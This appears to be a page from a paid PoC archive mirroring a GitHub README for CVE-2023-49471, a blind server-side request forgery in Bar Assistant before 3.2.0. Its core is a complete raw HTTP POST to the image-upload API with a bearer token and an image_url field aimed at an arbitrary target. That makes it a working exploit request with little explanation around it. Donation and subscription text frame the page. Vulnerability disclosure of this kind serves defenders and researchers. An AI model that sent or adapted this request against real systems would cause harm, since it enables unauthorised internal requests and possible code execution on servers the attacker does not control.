Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-49471 PoC — Bar Assistant 安全漏洞

Source
https://github.com/zunak/CVE-2023-49471
Associated Vulnerability
Title:Bar Assistant 安全漏洞 (CVE-2023-49471)
Description:Blind Server-Side Request Forgery (SSRF) vulnerability in karlomikus Bar Assistant before version 3.2.0 does not validate a parameter before making a request through Image::make(), which could allow authenticated remote attackers to execute arbitrary code.
Readme
# CVE-2023-49471

#### Vulnerability Type
Blind SSRF

#### Affected Product and Version
Bar assistant < 3.2.0

#### Attack Vector
Authenticated users upload an image by URL to the application.

#### Description
The application does not validate a parameter before making a request through Image::make(), which could allow perpetrator to perform Server-side Request Forgery attack.

#### PoC
```
POST /bar/api/images HTTP/1.1

Host: localhost:3000

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=---------------------------8290129562507108753887567115

Content-Length: 459

Referer: http://localhost:3000/cocktails/form

Origin: http://localhost:3000

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

authorization: Bearer 1|A3dV5SfOEqxNOY8UQmz2wDqA6ssdtBGHoVyjCFTR186abc29

Connection: close



-----------------------------8290129562507108753887567115

Content-Disposition: form-data; name="images[0][image_url]"



http://<target>/<path>

-----------------------------8290129562507108753887567115

Content-Disposition: form-data; name="images[0][copyright]"





-----------------------------8290129562507108753887567115

Content-Disposition: form-data; name="images[0][sort]"



1

-----------------------------8290129562507108753887567115--
```
File Snapshot

 [4.0K]  /data/pocs/e6be47207adde4f0790e72df8f4e79107532fa2c
└── [1.4K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →